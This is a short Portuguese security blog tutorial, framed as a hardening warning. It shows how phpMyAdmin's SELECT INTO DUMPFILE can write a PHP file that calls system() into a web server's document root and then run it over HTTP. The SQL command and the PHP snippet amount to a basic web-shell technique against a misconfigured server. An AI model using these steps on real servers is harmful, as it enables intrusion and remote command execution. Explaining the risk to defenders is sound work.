Este artigo tem como objetivo reforçar a importância da realização do hardening e/ou revisão de segurança antes de colocar um servidor de banco de dados em produção e liberar os acessos ao banco sem as devidas revisões de permissões.

Aqui eu mostro apenas um exemplo de como criar um arquivo dentro do servidor web utilizando o phpMyAdmin. Certamente os profissionais de segurança sabem o impacto que isso pode causar na segurança dos servidores.

Para mais detalhes acesse : mariadb.com/kb/en/select-into-dumpfile

01 - Passo

Estou conectado no servidor web e executei os comandos para verificar o hostname, ips e a existência do arquivo comandos.php

Linux
hostname

ifconfig

ls -l /var/www/html/comandos.php

02 - Passo

Como pode observar o arquivo comandos.php não existe no servidor.

http://www/comandos.php

03 - Passo

Acesse o phpMyAdmin e utilize qualquer banco de dados disponível para criar a tabela comandos.

04 - Passo

Neste exemplo criei a tabela comandos com 02 colunas, id e comandos.

id

  • Tipo : INT
  • Tamanho : 1
  • AUTO_INCREMENT :

comandos

  • Tipo : VARCHAR
  • Tamanho : 255

05 - Passo

Insira os valores a seguir :

id : 1

comandos

Crie uma página em PHP usando os comandos dentro de system('ifconfig');

06 - Passo

Clique na aba SQL e execute o comando a seguir para criar o arquivo comandos.php.

SELECT * INTO DUMPFILE '/var/www/html/comandos.php' FROM `comandos` WHERE 1

07 - Passo

Acesse o arquivo comandos.php criado no servidor para obter as informações.

http://www/comandos.php

👍 Se este artigo te ajudou compartilhe!



  Autor

Marcos Henrique

 São Paulo/SP



  Ferramentas de Exploração

© 2022 - 100SECURITY

Contato